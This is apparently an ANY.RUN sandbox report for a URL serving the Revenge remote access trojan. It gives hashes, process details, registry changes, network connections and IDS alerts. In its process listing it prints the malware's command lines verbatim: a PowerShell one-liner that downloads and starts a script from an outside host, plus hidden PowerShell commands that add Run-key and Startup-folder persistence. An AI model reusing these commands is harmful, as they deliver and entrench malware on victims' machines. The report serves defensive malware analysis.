analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
URL:

http://docandpdfonline.servepics.com

Full analysis: https://app.any.run/tasks/be792a11-7988-4983-a0b6-578eca6ba7b8
Verdict: Malicious activity
Threats:

Remote access trojans (RATs) are a type of malware that enables attackers to establish complete to partial control over infected computers. Such malicious programs often have a modular design, offering a wide range of functionalities for conducting illicit activities on compromised systems. Some of the most common features of RATs include access to the users’ data, webcam, and keystrokes. This malware is often distributed through phishing emails and links.

Analysis date: June 18, 2019, 17:01:17
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
rat
revenge
Indicators:
MD5:

D08FD47F4FE7FDDA319AC24177223D27

SHA1:

45A7865B7FACD39AF7AC392EB66A1F6C45EF533A

SHA256:

E48A9DD83769BE5F2B6A72E58094DB69935A3A41897D9FF9083AE3C58103E2C3

SSDEEP:

3:N1KaK89KoT72:CaxEoG

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • cmd.exe (PID: 3080)
    • Changes the autorun value in the registry

      • powershell.exe (PID: 1020)
    • Writes to a start menu file

      • powershell.exe (PID: 3196)
    • REVENGE was detected

      • powershell.exe (PID: 2272)
    • Connects to CnC server

      • powershell.exe (PID: 2272)
  • SUSPICIOUS

    • Executed via COM

      • mshta.exe (PID: 752)
    • Starts CMD.EXE for commands execution

      • mshta.exe (PID: 752)
    • Executes PowerShell scripts

      • WScript.exe (PID: 3964)
      • wscript.exe (PID: 1892)
    • Creates files in the user directory

      • powershell.exe (PID: 3644)
      • powershell.exe (PID: 1020)
      • powershell.exe (PID: 3196)
      • powershell.exe (PID: 2832)
      • powershell.exe (PID: 2272)
    • Executes scripts

      • powershell.exe (PID: 3644)
      • powershell.exe (PID: 2832)
  • INFO

    • Changes internet zones settings

      • iexplore.exe (PID: 2920)
    • Application launched itself

      • iexplore.exe (PID: 2920)
    • Reads internet explorer settings

      • iexplore.exe (PID: 3660)
      • mshta.exe (PID: 752)
    • Creates files in the user directory

      • iexplore.exe (PID: 3660)
    • Reads Internet Cache Settings

      • iexplore.exe (PID: 2920)
      • iexplore.exe (PID: 3660)
    • Reads settings of System Certificates

      • iexplore.exe (PID: 2920)
    • Changes settings of System certificates

      • iexplore.exe (PID: 2920)
    • Adds / modifies Windows certificates

      • iexplore.exe (PID: 2920)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
50
Monitored processes
11
Malicious processes
7
Suspicious processes
2

Behavior graph

Click at the process to see the details
start iexplore.exe iexplore.exe mshta.exe cmd.exe no specs powershell.exe wscript.exe no specs powershell.exe no specs wscript.exe no specs powershell.exe powershell.exe #REVENGE powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2920"C:\Program Files\Internet Explorer\iexplore.exe" http://docandpdfonline.servepics.comC:\Program Files\Internet Explorer\iexplore.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3660"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2920 CREDAT:71937C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
752C:\Windows\System32\mshta.exe -EmbeddingC:\Windows\System32\mshta.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3080"C:\Windows\System32\cmd.exe" /c powershell (new-object System.Net.WebClienT).DownloadFile('https://briargrove.org/wp-includes/microsoft.js','%temp%\microsoft.js'); Start '%temp%\microsoft.js'C:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2832powershell (new-object System.Net.WebClienT).DownloadFile('https://briargrove.org/wp-includes/microsoft.js','C:\Users\admin\AppData\Local\Temp\microsoft.js'); Start 'C:\Users\admin\AppData\Local\Temp\microsoft.js'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3964"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\microsoft.js" C:\Windows\System32\WScript.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
3644"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\microsoft.js',[System.IO.File]::ReadAllText('C:\Users\admin\AppData\Local\Temp\microsoft.js'));wscript 'C:\Users\admin\AppData\Roaming\microsoft.js'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1892"C:\Windows\system32\wscript.exe" C:\Users\admin\AppData\Roaming\microsoft.jsC:\Windows\system32\wscript.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
1020"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\admin\AppData\Roaming\microsoft.js' -PropertyType String -Force;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3196"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.js',[System.IO.File]::ReadAllText('C:\Users\admin\AppData\Roaming\microsoft.js'))"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 898
Read events
1 505
Write events
389
Delete events
4

Modification events

(PID) Process:(2920) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
Operation:writeName:CompatibilityFlags
Value:
0
(PID) Process:(2920) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
(PID) Process:(2920) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
1
(PID) Process:(2920) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
Operation:writeName:SecuritySafe
Value:
1
(PID) Process:(2920) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
Operation:writeName:ProxyEnable
Value:
0
(PID) Process:(2920) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
Operation:writeName:SavedLegacySettings
Value:
4600000071000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000
(PID) Process:(2920) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\Active
Operation:writeName:{B93D8AC9-91EA-11E9-B63D-5254004A04AF}
Value:
0
(PID) Process:(2920) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore
Operation:writeName:Type
Value:
4
(PID) Process:(2920) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore
Operation:writeName:Count
Value:
1
(PID) Process:(2920) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore
Operation:writeName:Time
Value:
E3070600020012001100010022004300
Executable files
0
Suspicious files
11
Text files
12
Unknown types
8

Dropped files

PID
Process
Filename
Type
3660iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\YJM2L6MK\docandpdfonline_servepics_com[1].txt
MD5:
SHA256:
2920iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\favicon[1].ico
MD5:
SHA256:
2920iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
2832powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TFZ6275B58QV2CWHMW0V.temp
MD5:
SHA256:
3644powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Q92I42P5KIAYYU5NWYMG.temp
MD5:
SHA256:
3660iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\YJM2L6MK\microsoft[1].htahtml
MD5:5AF04901EAD6FAC905CA924059E5759A
SHA256:59255B3327028BA0D23DC1CF76D0DD857056CF38547307F1E64D08FAA1B56A02
3660iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\desktop.iniini
MD5:4A3DEB274BB5F0212C2419D3D8D08612
SHA256:2842973D15A14323E08598BE1DFB87E54BF88A76BE8C7BC94C56B079446EDF38
3660iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.datdat
MD5:0626B2DC1F9E45C14C2CE953E6D96CCE
SHA256:56FF31B32812368EC22B193863D26CB815B9D7B64A60BA9E21970BC5F9D4706A
3660iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.datdat
MD5:7234EA72B706B88F0E9CA60BDFCF7353
SHA256:AF3EEFB5D7C634AB6EB63D65F2E8E26953C23833EBAFF37EC5FE863A6630545B
3644powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF12646f.TMPbinary
MD5:16D0FD6E07266B2C15A9D7BC6623F506
SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
8
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3660
iexplore.exe
GET
193.56.28.128:80
http://docandpdfonline.servepics.com/microsoft.hta
unknown
malicious
2920
iexplore.exe
GET
404
193.56.28.128:80
http://docandpdfonline.servepics.com/images/favicon.ico
unknown
html
311 b
malicious
3660
iexplore.exe
GET
193.56.28.128:80
http://docandpdfonline.servepics.com/microsoft.hta
unknown
malicious
3660
iexplore.exe
GET
200
193.56.28.128:80
http://docandpdfonline.servepics.com/
unknown
html
293 b
malicious
752
mshta.exe
GET
200
193.56.28.128:80
http://docandpdfonline.servepics.com/microsoft.hta
unknown
html
375 Kb
malicious
2920
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
2920
iexplore.exe
GET
404
193.56.28.128:80
http://docandpdfonline.servepics.com/images/favicon.ico
unknown
html
311 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3660
iexplore.exe
193.56.28.128:80
docandpdfonline.servepics.com
malicious
2920
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
2832
powershell.exe
166.62.121.61:443
briargrove.org
GoDaddy.com, LLC
US
suspicious
2272
powershell.exe
194.5.98.253:5478
FR
malicious
2920
iexplore.exe
193.56.28.128:80
docandpdfonline.servepics.com
malicious
752
mshta.exe
193.56.28.128:80
docandpdfonline.servepics.com
malicious

DNS requests

Domain
IP
Reputation
docandpdfonline.servepics.com
  • 193.56.28.128
malicious
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
briargrove.org
  • 166.62.121.61
suspicious

Threats

PID
Process
Class
Message
3660
iexplore.exe
Potentially Bad Traffic
ET POLICY Possible HTA Application Download
3660
iexplore.exe
Attempted User Privilege Gain
ET WEB_CLIENT GENERIC VB ShellExecute Function Inside of VBSCRIPT tag
3660
iexplore.exe
Potentially Bad Traffic
ET POLICY Possible HTA Application Download
752
mshta.exe
Potentially Bad Traffic
ET POLICY Possible HTA Application Download
752
mshta.exe
Attempted User Privilege Gain
ET CURRENT_EVENTS SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl
752
mshta.exe
A Network Trojan was detected
ET CURRENT_EVENTS SUSPICIOUS MSXMLHTTP DL of HTA (Observed in CVE-2017-0199)
752
mshta.exe
Attempted User Privilege Gain
ET WEB_CLIENT GENERIC VB ShellExecute Function Inside of VBSCRIPT tag
2272
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] Revenge/hamza-RAT CnC Checkin
2272
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] MSIL/Maadawy-RAT (njRAT) CnC Response
2272
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] MSIL/Maadawy-RAT (njRAT) CnC Response
13 ETPRO signatures available at the full report
No debug info